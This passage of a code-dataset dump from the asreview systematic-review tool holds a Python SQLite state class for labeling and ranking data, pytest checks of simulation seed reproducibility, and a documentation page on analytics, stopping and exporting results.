= n[0]\n\n if n == 0:\n return None\n return n\n\n @property\n def exist_new_labeled_records(self):\n \"\"\"Return True if there are new labeled records.\n\n Return True if there are any record labels added since the last time\n the model ranking was added to the state. Also returns True if no\n model was trained yet, but priors have been added.\n \"\"\"\n labeled = self.get_labeled()\n last_training_set = self.get_last_ranking()[\"training_set\"]\n if last_training_set.empty:\n return len(labeled) > 0\n else:\n return len(labeled) > last_training_set.iloc[0]\n\n @property\n def model_has_trained(self):\n \"\"\"Return True if there is data of a trained model in the state.\"\"\"\n return self.settings_metadata[\"model_has_trained\"]\n\n def _add_settings_metadata(self, key, value):\n \"\"\"Add information to the settings_metadata dictionary.\"\"\"\n if self.read_only:\n raise ValueError(\"Can't change settings in read only mode.\")\n self.settings_metadata[key] = value\n\n with open(self._settings_metadata_fp, \"w\") as f:\n json.dump(self.settings_metadata, f)\n\n def add_record_table(self, record_ids):\n \"\"\"Add the record table to the state.\n\n Arguments\n ---------\n record_ids: list, np.array\n List containing all record ids of the dataset.\n \"\"\"\n record_sql_input = [(int(record_id),) for record_id in record_ids]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM record_table\")\n cur.executemany(\n \"INSERT INTO record_table (record_id) VALUES (?)\", record_sql_input\n )\n con.commit()\n\n def add_last_probabilities(self, probabilities):\n \"\"\"Save the probabilities produced by the last classifier.\n\n Arguments\n ---------\n probabilities: list, np.array\n List containing the probabilities for every record.\n \"\"\"\n proba_sql_input = [(proba,) for proba in probabilities]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n\n # Check that the number of rows in the table is 0 (if the table is not\n # yet populated), or that it's equal to len(probabilities).\n cur.execute(\"SELECT COUNT (*) FROM last_probabilities\")\n proba_length = cur.fetchone()[0]\n if not ((proba_length == 0) or (proba_length == len(proba_sql_input))):\n raise ValueError(\n f\"There are 
{proba_length} probabilities in the database, \"\n f\"but 'probabilities' has length {len(probabilities)}\"\n )\n\n cur.execute(\"\"\"DELETE FROM last_probabilities\"\"\")\n cur.executemany(\n \"INSERT INTO last_probabilities (proba) VALUES (?)\", proba_sql_input\n )\n con.commit()\n\n def add_last_ranking(\n self,\n ranked_record_ids,\n classifier,\n query_strategy,\n balance_strategy,\n feature_extraction,\n training_set,\n ):\n \"\"\"Save the ranking of the last iteration of the model.\n\n Save the ranking of the last iteration of the model, in the ranking\n order, so the record on row 0 is ranked first by the model.\n\n Arguments\n ---------\n ranked_record_ids: list, numpy.ndarray\n A list of records ids in the order that they were ranked.\n classifier: str\n Name of the classifier of the model.\n query_strategy: str\n Name of the query strategy of the model.\n balance_strategy: str\n Name of the balance strategy of the model.\n feature_extraction: str\n Name of the feature extraction method of the model.\n training_set: int\n Number of labeled records available at the time of training.\n \"\"\"\n record_ids = self.get_record_table()\n\n if len(record_ids) != len(ranked_record_ids):\n raise ValueError(\n \"The ranking should have the same length as the \" \"record table.\"\n )\n\n ranking = range(len(record_ids))\n classifiers = [classifier for _ in record_ids]\n query_strategies = [query_strategy for _ in record_ids]\n balance_strategies = [balance_strategy for _ in record_ids]\n feature_extractions = [feature_extraction for _ in record_ids]\n training_sets = [int(training_set) for _ in record_ids]\n ranking_times = [datetime.now()] * len(record_ids)\n\n # Create the database rows.\n db_rows = [\n (\n int(ranked_record_ids[i]),\n int(ranking[i]),\n classifiers[i],\n query_strategies[i],\n balance_strategies[i],\n feature_extractions[i],\n training_sets[i],\n ranking_times[i],\n )\n for i in range(len(record_ids))\n ]\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM last_ranking\")\n cur.executemany(\n (\n \"INSERT INTO last_ranking (record_id, ranking, classifier, \"\n \"query_strategy, balance_strategy, feature_extraction, \"\n \"training_set, time) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\n ),\n db_rows,\n )\n con.commit()\n con.close()\n\n # If it's the first ranking table to be added, set model_has_trained.\n if not self.model_has_trained:\n self._add_settings_metadata(\"model_has_trained\", True)\n\n def add_note(self, note, record_id):\n \"\"\"Add a text note to save with a labeled record.\n\n Arguments\n ---------\n note: str\n Text note to save.\n record_id: int\n Identifier of the record to which the note should be added.\n \"\"\"\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\n \"UPDATE results SET notes = ? 
WHERE record_id = ?\", (note, record_id)\n )\n con.commit()\n con.close()\n\n def add_labeling_data(self, record_ids, labels, notes=None, prior=False):\n \"\"\"Add the data corresponding to a labeling action to the state file.\n\n Arguments\n ---------\n record_ids: list, numpy.ndarray\n A list of ids of the labeled records as int.\n labels: list, numpy.ndarray\n A list of labels of the labeled records as int.\n notes: list of str/None\n A list of text notes to save with the labeled records.\n prior: bool\n Whether the added record are prior knowledge.\n \"\"\"\n\n # Check if the state is still valid.\n self._is_valid_state()\n\n labeling_times = [datetime.now()] * len(record_ids)\n\n if notes is None:\n notes = [None for _ in record_ids]\n\n lengths = [len(record_ids), len(labels), len(notes)]\n # Check that all input data has the same length.\n if len(set(lengths)) != 1:\n raise ValueError(\"Input data should be of the same length.\")\n n_records_labeled = len(record_ids)\n\n pool, _, pending = self.get_pool_labeled_pending()\n\n if prior:\n # Check that the record_ids are in the pool.\n if not all(record_id in pool.values for record_id in record_ids):\n raise ValueError(\n \"Labeling priors, but not all \" \"record_ids were found in the pool.\"\n )\n\n query_strategies = [\"prior\" for _ in record_ids]\n training_sets = [-1 for _ in record_ids]\n data = [\n (\n int(record_ids[i]),\n int(labels[i]),\n query_strategies[i],\n training_sets[i],\n labeling_times[i],\n notes[i],\n )\n for i in range(n_records_labeled)\n ]\n\n # If prior, we need to insert new records into the database.\n query = (\n \"INSERT INTO results (record_id, label, query_strategy, \"\n \"training_set, labeling_time, notes) \"\n \"VALUES (?, ?, ?, ?, ?, ?)\"\n )\n\n else:\n # Check that the record_ids are pending.\n if not all(record_id in pending.values for record_id in record_ids):\n raise ValueError(\n \"Labeling records, but not all \" \"record_ids were pending.\"\n )\n\n data = [\n (int(labels[i]), labeling_times[i], notes[i], int(record_ids[i]))\n for i in range(n_records_labeled)\n ]\n\n # If not prior, we need to update records.\n query = (\n \"UPDATE results SET label=?, labeling_time=?, \"\n \"notes=? WHERE record_id=?\"\n )\n\n # Add the rows to the database.\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(query, data)\n con.commit()\n con.close()\n\n def _add_labeling_data_simulation_mode(self, rows):\n \"\"\"Add labeling and model data to the results table.\n\n Add the labeling data and the model data at the same time to the\n results table. 
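All rows are inserted with a single executemany call in one transaction.\n 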
This is used for the simulation mode, since the model\n data is available at the time of labeling.\n\n Arguments\n ----------\n rows : list of tuples\n List of tuples (record_id: int, label: int, classifier: str,\n query_strategy: str, balance_strategy: str, feature_extraction: str,\n training_set: int, labeling_time: int, notes: str).\n \"\"\"\n query = (\n \"INSERT INTO results (record_id, label, classifier, \"\n \"query_strategy, balance_strategy, feature_extraction, \"\n \"training_set, labeling_time, notes) \"\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n )\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(query, rows)\n con.commit()\n con.close()\n\n def update_decision(self, record_id, label, note=None):\n \"\"\"Change the label of an already labeled record.\n\n Arguments\n ---------\n record_id: int\n Id of the record whose label should be changed.\n label: 0 / 1\n New label of the record.\n note: str\n Note to add to the record.\n \"\"\"\n\n con = self._connect_to_sql()\n cur = con.cursor()\n\n # Change the label.\n cur.execute(\n \"UPDATE results SET label = ?, notes = ? \" \"WHERE record_id = ?\",\n (label, note, record_id),\n )\n\n # Add the change to the decision changes table.\n cur.execute(\n (\n \"INSERT INTO decision_changes (record_id, new_label, time) \"\n \"VALUES (?, ?, ?)\"\n ),\n (record_id, label, datetime.now()),\n )\n\n con.commit()\n con.close()\n\n def delete_record_labeling_data(self, record_id):\n \"\"\"Delete the labeling data for the given record id.\n\n Arguments\n ----------\n record_id : str\n Identifier of the record to delete.\n\n \"\"\"\n current_time = datetime.now()\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM results WHERE record_id=?\", (record_id,))\n\n # Add the change to the decision changes table.\n cur.execute(\n (\n \"INSERT INTO decision_changes (record_id, new_label, time) \"\n \"VALUES (?,?, ?)\"\n ),\n (record_id, None, current_time),\n )\n con.commit()\n con.close()\n\n def get_decision_changes(self):\n \"\"\"Get the record ids for any decision changes.\n\n Get the record ids of the records whose labels have been changed\n after the original labeling action.\n\n Returns\n -------\n pd.DataFrame\n Dataframe with columns 'record_id', 'new_label', and 'time' for\n each record of which the labeling decision was changed.\n \"\"\"\n con = self._connect_to_sql()\n change_table = pd.read_sql_query(\"SELECT * FROM decision_changes\", con)\n con.close()\n return change_table\n\n def get_record_table(self):\n \"\"\"Get the record table of the state.\n\n Returns\n -------\n pd.Series:\n Series with name 'record_id' containing the record ids.\n \"\"\"\n con = self._connect_to_sql()\n record_table = pd.read_sql_query(\"SELECT * FROM record_table\", con)\n record_table = record_table[\"record_id\"]\n con.close()\n return record_table\n\n def get_last_probabilities(self):\n \"\"\"Get the probabilities produced by the last classifier.\n\n Returns\n -------\n pd.Series:\n Series with name 'proba' containing the probabilities.\n \"\"\"\n con = self._connect_to_sql()\n last_probabilities = pd.read_sql_query(\"SELECT * FROM last_probabilities\", con)\n con.close()\n return last_probabilities[\"proba\"]\n\n def get_last_ranking(self):\n \"\"\"Get the ranking from the state.\n\n Returns\n -------\n pd.DataFrame\n Dataframe with columns 'record_id', 'ranking', 'classifier',\n 'query_strategy', 'balance_strategy', 'feature_extraction',\n 'training_set' and 'time'. 
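The 'ranking' column is the record's position in the model's ordering\n (0 = ranked first).\n 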
It has one row for each record in the\n dataset, and is ordered by ranking.\n \"\"\"\n con = self._connect_to_sql()\n last_ranking = pd.read_sql_query(\"SELECT * FROM last_ranking\", con)\n con.close()\n return last_ranking\n\n def _move_ranking_data_to_results(self, record_ids):\n \"\"\"Move data from the ranking to the results table.\n\n Move the data with the given record_ids from the last_ranking table\n to the results table.\n\n Arguments\n ---------\n record_ids: list\n List of record ids in last ranking whose model data should be added\n to the results table.\n \"\"\"\n if self.model_has_trained:\n record_list = [(record_id,) for record_id in record_ids]\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(\n \"\"\"INSERT INTO results (record_id, classifier, query_strategy,\n balance_strategy, feature_extraction, training_set)\n SELECT record_id, classifier, query_strategy,\n balance_strategy, feature_extraction, training_set\n FROM last_ranking\n WHERE record_id=?\"\"\",\n record_list,\n )\n con.commit()\n con.close()\n else:\n raise StateError(\"Save trained model data \" \"before using this function.\")\n\n def query_top_ranked(self, n):\n \"\"\"Get the top ranked records from the ranking table.\n\n Get the top n instances from the pool according to the last ranking.\n Add the model data to the results table.\n\n Arguments\n ---------\n n: int\n Number of instances.\n\n Returns\n -------\n list\n List of record_ids of the top n ranked records.\n \"\"\"\n if self.model_has_trained:\n pool = self.get_pool()\n top_n_records = pool[:n].to_list()\n self._move_ranking_data_to_results(top_n_records)\n else:\n raise StateError(\"Save trained model data \" \"before using this function.\")\n\n return top_n_records\n\n # GET FUNCTIONS\n def get_data_by_query_number(self, query, columns=None):\n \"\"\"Get the data of a specific query from the results table.\n\n Arguments\n ---------\n query: int\n Number of the query of which you want the data. 
query=0 corresponds\n to all the prior records.\n columns: list\n List of columns names of the results table.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the data from the results table with the given\n query number and columns.\n \"\"\"\n if columns is not None:\n if not isinstance(columns, list):\n raise ValueError(\"The columns argument should be a list.\")\n col_query_string = \"*\" if columns is None else \",\".join(columns)\n\n if query == 0:\n sql_query = (\n f\"SELECT {col_query_string} FROM results WHERE \"\n f\"query_strategy='prior'\"\n )\n else:\n rowid = query + self.n_priors\n sql_query = (\n f\"SELECT {col_query_string} FROM results WHERE \" f\"rowid={rowid}\"\n )\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(sql_query, con)\n con.close()\n return data\n\n def get_data_by_record_id(self, record_id, columns=None):\n \"\"\"Get the data of a specific query from the results table.\n\n Arguments\n ---------\n record_id: int\n Record id of which you want the data.\n columns: list\n List of columns names of the results table.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the data from the results table with the given\n record_id and columns.\n \"\"\"\n query_string = \"*\" if columns is None else \",\".join(columns)\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results WHERE record_id={record_id}\", con\n )\n con.close()\n return data\n\n def get_dataset(self, columns=None, priors=True, pending=False):\n \"\"\"Get a subset from the results table.\n\n Can be used to get any column subset from the results table.\n Most other get functions use this one, except some that use a direct\n SQL query for efficiency.\n\n Arguments\n ---------\n columns: list, str\n List of columns names of the results table, or a string containing\n one column name.\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.DataFrame:\n Dataframe containing the data of the specified columns of the\n results table.\n \"\"\"\n if isinstance(columns, str):\n columns = [columns]\n\n if (not priors) or (not pending):\n sql_where = []\n if not priors:\n sql_where.append(\"query_strategy is not 'prior'\")\n if not pending:\n sql_where.append(\"label is not NULL\")\n\n sql_where_str = f\"WHERE {sql_where[0]}\"\n if len(sql_where) == 2:\n sql_where_str += f\" AND {sql_where[1]}\"\n else:\n sql_where_str = \"\"\n\n # Query the database.\n query_string = \"*\" if columns is None else \",\".join(columns)\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results {sql_where_str}\", con\n )\n con.close()\n\n return data\n\n def get_order_of_labeling(self, priors=True, pending=False):\n \"\"\"Get full array of record id's in order that they were labeled.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n The record_id's in the order that they were labeled.\n \"\"\"\n return self.get_dataset(\"record_id\", priors=priors, pending=pending)[\n \"record_id\"\n ]\n\n def get_priors(self, columns=[\"record_id\"]):\n \"\"\"Get the record ids of the priors.\n\n Returns\n -------\n pd.Series:\n The record_id's of the priors in the order they were added.\n \"\"\"\n\n query_string = \"*\" if columns is None else 
\",\".join(columns)\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results\" \" WHERE query_strategy is 'prior'\",\n con,\n )\n con.close()\n\n return data\n\n def get_labels(self, priors=True, pending=False):\n \"\"\"Get the labels from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the labels at each labelling moment.\n \"\"\"\n\n return self.get_dataset(\"label\", priors=priors, pending=pending)[\"label\"]\n\n def get_classifiers(self, priors=True, pending=False):\n \"\"\"Get the classifiers from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the classifier used at each labeling moment.\n \"\"\"\n return self.get_dataset(\"classifier\", priors=priors, pending=pending)[\n \"classifier\"\n ]\n\n def get_query_strategies(self, priors=True, pending=False):\n \"\"\"Get the query strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the query strategy used to get the record to\n query at each labeling moment.\n \"\"\"\n return self.get_dataset(\"query_strategy\", priors=priors, pending=pending)[\n \"query_strategy\"\n ]\n\n def get_balance_strategies(self, priors=True, pending=False):\n \"\"\"Get the balance strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the balance strategy used to get the training\n data at each labeling moment.\n \"\"\"\n return self.get_dataset(\"balance_strategy\", priors=priors, pending=pending)[\n \"balance_strategy\"\n ]\n\n def get_feature_extraction(self, priors=True, pending=False):\n \"\"\"Get the query strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the feature extraction method used for the\n classifier input at each labeling moment.\n \"\"\"\n return self.get_dataset(\"feature_extraction\", priors=priors, pending=pending)[\n \"feature_extraction\"\n ]\n\n def get_training_sets(self, priors=True, pending=False):\n \"\"\"Get the training_sets from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the training set on which the classifier was fit\n at each labeling moment.\n \"\"\"\n return self.get_dataset(\"training_set\", priors=priors, pending=pending)[\n \"training_set\"\n ]\n\n def get_labeling_times(self, time_format=\"int\", priors=True, pending=False):\n \"\"\"Get the time of labeling from the state.\n\n Arguments\n ---------\n time_format: 'int' or 
'datetime'\n Format of the return value. If it is 'int' you get a UTC timestamp,\n if it is 'datetime' you get datetime objects instead of integers.\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n If time_format='int' you get a UTC timestamp (integer number of\n microseconds), if it is 'datetime' you get datetime format.\n \"\"\"\n times = self.get_dataset(\"labeling_time\", priors=priors, pending=pending)[\n \"labeling_time\"\n ]\n\n # Convert time to datetime format.\n if time_format == \"datetime\":\n times = times.apply(lambda x: datetime.utcfromtimestamp(x / 10**6))\n\n return times\n\n # Get pool, labeled and pending in slightly more optimized way than via\n # get_dataset.\n def get_pool(self):\n \"\"\"Get the unlabeled, not-pending records in ranking order.\n\n Get the pool of unlabeled records, not pending a labeling decision,\n in the ranking order. If you only want the records in the pool, this\n is more efficient than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.Series\n Series containing the record_ids of the unlabeled, not pending\n records, in the order of the last available ranking.\n \"\"\"\n # If the model has trained, use the ranking to order the pool.\n con = self._connect_to_sql()\n if self.model_has_trained:\n query = \"\"\"SELECT last_ranking.record_id, last_ranking.ranking,\n results.query_strategy\n FROM last_ranking\n LEFT JOIN results\n ON last_ranking.record_id = results.record_id\n WHERE results.query_strategy is null\n ORDER BY ranking\n \"\"\"\n df = pd.read_sql_query(query, con)\n\n # Else return all records not yet in the results table.\n else:\n query = \"\"\"SELECT record_table.record_id, results.query_strategy\n FROM record_table\n LEFT JOIN results\n ON record_table.record_id = results.record_id\n WHERE results.query_strategy is null\n \"\"\"\n df = pd.read_sql_query(query, con)\n\n con.close()\n return df[\"record_id\"]\n\n def get_labeled(self):\n \"\"\"Get the labeled records in order of labeling.\n\n Get the record_ids and labels of the labeled records in order of\n labeling. If you only want the labeled records, this is more efficient\n than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the record_ids and labels of the labeled\n records, in the order that they were labeled.\n \"\"\"\n con = self._connect_to_sql()\n query = \"\"\"SELECT record_id, label FROM results\n WHERE label is not null\"\"\"\n df = pd.read_sql_query(query, con)\n con.close()\n return df\n\n def get_pending(self):\n \"\"\"Get the record_ids of the records pending a labeling decision.\n\n If you only want the pending records, this is more efficient\n than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.Series\n A series containing the record_ids of the records whose label is\n pending.\n \"\"\"\n con = self._connect_to_sql()\n query = \"\"\"SELECT record_id FROM results WHERE label is null\"\"\"\n df = pd.read_sql_query(query, con)\n con.close()\n return df[\"record_id\"]\n\n def get_pool_labeled_pending(self):\n \"\"\"Return the unlabeled pool, labeled and pending records.\n\n Convenience function to get the pool, labeled and pending records in\n one SQL query. 
If you only want one of these, it is more efficient to\n use the methods 'get_pool', 'get_labeled' or 'get_pending'.\n\n Returns\n -------\n tuple (pd.Series, pd.DataFrame, pd.Series):\n Returns a tuple (pool, labeled, pending). Pool is a series\n containing the unlabeled, not pending record_ids, ordered by the\n last predicted ranking of the model. Labeled is a dataframe\n containing the record_ids and labels of the labeled records, in the\n order that they were labeled. Pending is a series containing the\n record_ids of the records whose label is pending.\n \"\"\"\n con = self._connect_to_sql()\n\n query = \"\"\"SELECT record_table.record_id, results.label,\n results.rowid AS label_order, results.query_strategy,\n last_ranking.ranking\n FROM record_table\n LEFT JOIN results\n ON results.record_id=record_table.record_id\n LEFT JOIN last_ranking\n ON record_table.record_id=last_ranking.record_id\n ORDER BY label_order, ranking\n \"\"\"\n\n df = pd.read_sql_query(query, con)\n con.close()\n labeled = df.loc[~df[\"label\"].isna()].loc[:, [\"record_id\", \"label\"]].astype(int)\n pool = df.loc[df[\"label_order\"].isna(), \"record_id\"].astype(int)\n pending = (\n df.loc[df[\"label\"].isna() & ~df[\"query_strategy\"].isna()]\n .loc[:, \"record_id\"]\n .astype(int)\n )\n\n return pool, labeled, pending\n" }, { "alpha_fraction": 0.5668614506721497, "alphanum_fraction": 0.5936747789382935, "avg_line_length": 25.20720672607422, "blob_id": "3ecf77ecb040c81233fb64e6619993fb28337857", "content_id": "0d672f9748cf71413c5a4a8faaf2c853391841ab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2909, "license_type": "permissive", "max_line_length": 74, "num_lines": 111, "path": "/tests/test_init.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom asreview.entry_points.simulate import SimulateEntryPoint\nfrom asreview.project import open_state\n\nDATA_FP = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\n\n\[email protected](\n \"seed\",\n [\n (535),\n (165),\n (42),\n ],\n)\ndef test_init_seed(tmpdir, seed):\n project1_fp = Path(tmpdir, \"tmp_state1.asreview\")\n project2_fp = Path(tmpdir, \"tmp_state2.asreview\")\n\n entry_point = SimulateEntryPoint()\n\n # simulate run 1\n argv1 = (\n f\"{DATA_FP} -s {project1_fp} -m nb --init_seed\"\n f\" {seed} --n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n\n # simulate run 2\n argv2 = (\n f\"{DATA_FP} -s {project2_fp} -m nb --init_seed\"\n f\" {seed} --n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n\n # run the simulations\n entry_point.execute(argv1)\n entry_point.execute(argv2)\n\n # open the state file and extract the priors\n with open_state(project1_fp) as s1:\n record_ids1 = s1.get_priors()[\"record_id\"]\n\n with open_state(project2_fp) as s2:\n record_ids2 = s2.get_priors()[\"record_id\"]\n\n assert record_ids1.tolist() == record_ids2.tolist()\n\n\ndef test_no_seed(tmpdir):\n priors = []\n for i in range(20):\n # get project url\n project_fp = Path(tmpdir, f\"tmp_state_{i}.asreview\")\n\n entry_point = SimulateEntryPoint()\n argv = (\n f\"{DATA_FP} -s {project_fp} -m nb \"\n f\"--n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n entry_point.execute(argv)\n\n # open the state file and extract the priors\n with open_state(project_fp) as s:\n priors.extend(s.get_priors()[\"record_id\"].tolist())\n\n assert len(set(priors)) > 
2\n\n\[email protected](\n \"seed\",\n [\n (535),\n (165),\n (42),\n ],\n)\ndef test_model_seed(tmpdir, seed):\n project1_fp = Path(tmpdir, \"tmp_state1.asreview\")\n project2_fp = Path(tmpdir, \"tmp_state2.asreview\")\n\n entry_point = SimulateEntryPoint()\n\n # simulate run 1\n argv1 = (\n f\"{DATA_FP} -s {project1_fp} -m rf --init_seed {seed}\"\n f\" --seed {seed}\"\n f\" --n_prior_excluded 1 --n_prior_included 1\".split()\n )\n\n # simulate run 2\n argv2 = (\n f\"{DATA_FP} -s {project2_fp} -m rf --init_seed {seed}\"\n f\" --seed {seed}\"\n f\" --n_prior_excluded 1 --n_prior_included 1\".split()\n )\n\n # run the simulations\n entry_point.execute(argv1)\n entry_point.execute(argv2)\n\n # open the state file and extract the priors\n with open_state(project1_fp) as s1:\n record_table1 = s1.get_dataset().drop(\"labeling_time\", axis=1)\n\n with open_state(project2_fp) as s2:\n record_table2 = s2.get_dataset().drop(\"labeling_time\", axis=1)\n\n assert_frame_equal(record_table1, record_table2)\n" }, { "alpha_fraction": 0.7393479347229004, "alphanum_fraction": 0.7510188817977905, "avg_line_length": 34.959999084472656, "blob_id": "a2e17a89a4f7dacff287e90ff3bdb8f57be33933", "content_id": "da19c699618d732f164ad005aac0f58708af383c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5398, "license_type": "permissive", "max_line_length": 187, "num_lines": 150, "path": "/docs/source/progress.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Progress and results\n====================\n\nDuring screening, you might want to keep track of your progress and to obtain\ninformation for your stopping criteria. This section provides documentation on\nuseful tools for these purposes.\n\nAnalytics\n---------\n\nASReview LAB offers some insightful statistics, a progress chart, and recall\nchart to keep track of your screening process and help you to decide when to\nstop screening.\n\nTo open\nthe statistics panel:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on Analytics on in the left menu.\n\n\n.. figure:: ../images/project_analytics.png\n :alt: ASReview LAB progress analytics for fully labeled\n\n This figure shows the Analytics page of a fully labeled dataset. All\n relevant records are found in the first part of the screening.\n\n\nSummary statistics\n~~~~~~~~~~~~~~~~~~\n\nThe summary statistics are counts of the records in your dataset.\n\n- Total records: the total number of records in your dataset.\n- Labeled records: the number of records that you labeled as relevant or irrelevant, including those you added as prior knowledge.\n- Relevant records: the number of records that you labeled as relevant, including those you added as prior knowledge.\n- Irrelevant records: the number of records that you labeled as irrelevant, including those you added as prior knowledge.\n- Irrelevant since last relevant: the number of irrelevant records you have seen since the last relevant record. \n\n\nCharts\n~~~~~~\n\nThe charts on the analytics page can be useful to monitor your progress. There\nis a *Progress* and a *Recall* chart. The charts do not include prior\nknowledge and are most relevant after you have screened at least 10 records.\n\n\n**Progress chart**\n\nThe progress chart plots the number of relevant records in the last 10 records\nthat you reviewed in ASReview LAB. 
For example, when you reviewed 100 records,\nyou labeled 3 relevant records between the 91st and 100th reviewed records.\n\n**Recall chart**\n\nThe recall chart plots the number of relevant records against the number of\nrecords that you reviewed in ASReview LAB. *Relevant by ASReview LAB* refers to\nthe relevant records that you labeled with the assistance of the active\nlearning model. *Random relevant* refers to the relevant records that you might\nfind if you manually reviewed the records so far without the assistance of the\nactive learning model.\n\n**Export Figure**\n\nThe plots can be exported as a figure:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on Analytics in the left menu.\n4. Click on the hamburger menu next to the Progress or Recall chart.\n5. Select *Download SVG* or *PNG* to export a figure, or select *Download CSV* to export the data behind the figure.\n\n\nStop screening\n--------------\n\nThe `blogpost\n*ASReview Class 101* <https://asreview.ai/blog/asreview-class-101/>`_ and the\n`How to stop screening?\n<https://github.com/asreview/asreview/discussions/557>`_ discussion provide\ntips on when to stop screening.\n\n.. tip::\n\n The number of *irrelevant records since last relevant* will increase the longer you screen.\n\n.. tip::\n\n With *Maximum* as :ref:`project_create:Query Strategy`, you will\n see a decline in the number of relevant items in the plots the longer you screen. This may\n help to decide when to `stop screening <https://github.com/asreview/asreview/discussions/557>`_.\n\n.. tip::\n\n The data behind the recall plot can be used to calculate the `knee-algorithm <https://github.com/asreview/asreview/discussions/1115#discussioncomment-2812003>`_ as a stopping criterion.\n\n\nMark project as finished\n------------------------\n\nWhen you decide to stop screening, you can mark the project as finished. You\ncan undo this at any time. To mark your project as finished:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects).\n3. Hover over the project you want to mark as finished and click on *Options*.\n4. Click on *Mark as finished*.\n\nThe button to continue screening is now disabled. This can be undone by\nclicking again on *Mark as in review*.\n\n\nExport results\n--------------\n\nYou can export the results of your labeling to a RIS, CSV, TSV, or Excel file.\nA file contains all imported data including your decisions.\n\nThe following variables will be added to your dataset:\n\n- The column titled **included** contains the labels as provided by the user:\n ``0`` = not relevant, ``1`` = relevant; if missing, the record was\n not seen during the screening process.\n- The column titled **asreview_ranking** contains an identifier to\n preserve the rank ordering as described below.\n\nThe file is ordered as follows:\n\n1. All relevant records you have seen, in the order they were shown during the screening process.\n2. All records not seen during the screening, ordered from most to least relevant according to the last iteration of the model.\n3. All irrelevant records you have seen, in the order they were shown during the screening process.\n\n\nTo download your results follow these steps:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on *Export* in the menu on the left.\n4. Select *Dataset*.\n5. Select the file type you prefer: Excel, RIS, TSV, or CSV.\n6. Save the file to your device.\n\n
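As an illustration, here is a minimal sketch (not an ASReview command; ``myreview.csv`` is a placeholder for your own export) that loads an exported CSV and tallies the **included** column described above:\n\n.. code:: python\n\n import pandas as pd\n\n # load the exported dataset (CSV export assumed)\n df = pd.read_csv(\"myreview.csv\")\n\n # 1 = relevant, 0 = irrelevant, missing = not seen during screening\n print(df[\"included\"].value_counts(dropna=False))\n\n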
